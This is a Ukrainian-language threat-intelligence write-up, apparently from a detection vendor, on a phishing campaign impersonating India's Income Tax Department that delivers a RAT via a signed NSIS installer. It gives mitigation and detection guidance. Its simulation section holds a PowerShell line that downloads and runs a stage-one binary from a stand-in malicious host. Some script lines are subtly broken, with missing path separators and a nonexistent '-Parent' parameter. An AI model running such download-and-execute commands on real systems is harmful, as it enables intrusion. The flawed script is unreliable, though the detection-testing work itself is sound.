Фішингова кампанія імітує Індійський податок на прибуток для атак на бізнес
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Операція фішингу, яка імітує Індійське податкове управління, доставляє замінований PDF, який перенаправляє отримувачів на підробний портал відповідності. Сайт запрошує жертву завантажити ZIP-пакет, що містить підписаний NSIS-інсталятор, який потім розгортає багатоступеневий троян для віддаленого доступу. RAT зберігає активність, створюючи службу Windows, і спілкується з кількома серверами C2 через нестандартні порти.
Розслідування
Дослідники проаналізували PDF-пастку, вбудовану URL-адресу та робочий процес ланцюгового інсталятора NSIS. Вони задокументували виконувані файли, що були розміщені на диску, створення прихованої папки з установкою і реєстрацію NSecRTS.exe як служби Windows. У звіті також були захоплені вихідні зв’язки з трьома IP-адресами та підкреслено використання підписаних корисних навантажень по всьому ланцюгу доставки.
Пом’якшення
Заблокуйте зловмисний домен та пов’язані IP-адреси на периметрі та через проксі-контролі. Посильте захист електронної пошти для маркування тем податкової тематики і посилань, що ведуть до порталів, схожих на портали відповідності. Запобігайте автоматичному виконанню неперевірених інсталяторів, де можливо, і контролюйте створення підозрілих служб — особливо тих, що мають назву «Служба захисту в режимі реального часу Windows».
Відповідь
Сигналізуйте про наведені імена файлів, хеші та активність реєстрації сервісів Windows, пов’язаних із ланцюгом інфекцій. Ізолюйте уражені кінцеві точки, отримайте зображення пам’яті та диска, та проведіть повне судово-медичне дослідження, щоб виявити будь-які додаткові стадії RAT або інструменти. Видаліть артефакти збереження та скиньте потенційно скомпрометовані облікові дані, щоб запобігти повторному входу.
Потік атаки
Виявлення
Підозріле командування і контроль через запит DNS незвичного рівня домену верхнього рівня (TLD)
Переглянути
IOCs (DestinationIP) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси
Переглянути
IOCs (SourceIP) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси
Переглянути
IOCs (HashMd5) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси
Переглянути
Виявлення виконання шкідливого ПЗ у кампанії фішингу з темою Індійського податкового управління [Створення процесу Windows]
Переглянути
Виявлення C2-комунікації NSecRTS.exe [Мережеве підключення Windows]
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базових даних перед польотом повинна бути пройдена.
Мотивування: У цьому розділі детально описується точне виконання техніки зловмисника (TTP), розроблене для активації правила виявлення. Команди та опис ПОВИННІ безпосередньо відображати ідентифіковані TTP і мати на меті створити точну телеметрію, очікувану логікою виявлення.
-
Атака: Нарратив та команди:
Зловмисник доставляє фішинговий електронний лист під назвою «Податкова повістка». Підключення – це зловмисний документ Word, який скидаєsetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%.Жертва виконує файл, який у свою чергу запускаєSibuia.exe(справжній корисний вантаж) як свій потомок. Цей ланцюг «батько-дитина» спроектований для обходу загальних попереджень про створення процесів, але виявлений правилом Sigma.Кроки, які виконуються на скомпрометованому хості:
- Скидання бінарного файлу першого етапу:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Виконання бінарного файлу першого етапу:
Start-Process -FilePath $stage1 -NoNewWindow - Бінарний файл першого етапу внутрішньо створює бінарний файл другого етапу
Sibuia.exeв тій самій директорії і запускає його: (Симулюється нижченаведеним тестовим скриптом.)
- Скидання бінарного файлу першого етапу:
-
Скрипт для регресійного тестування:
Скрипт нижче відтворює точний зв’язок «батько-дитина», необхідний для спрацювання правила.# ------------------------------------------------- # Симуляція фішингового ланцюга Податкової інспекції Індії # ------------------------------------------------- # Визначення шляхів $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Створення макетів бінарних файлів (нульові байти — досить для ведення журналу Sysmon) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Переконатися, що файли виконувані (Windows не потребує chmod) Write-Host "[*] Запуск stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Дати stage1 момент на "створення" stage2 (симулюється прямим запуском) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 створює stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Симуляція завершена. Перевірте виявлення в SIEM." # ------------------------------------------------- -
Команди для очищення:
Видалити артефакти та завершити будь-які залишкові процеси.# Зупинка будь-яких залишкових процесів Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалення файлів Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Очищення завершено."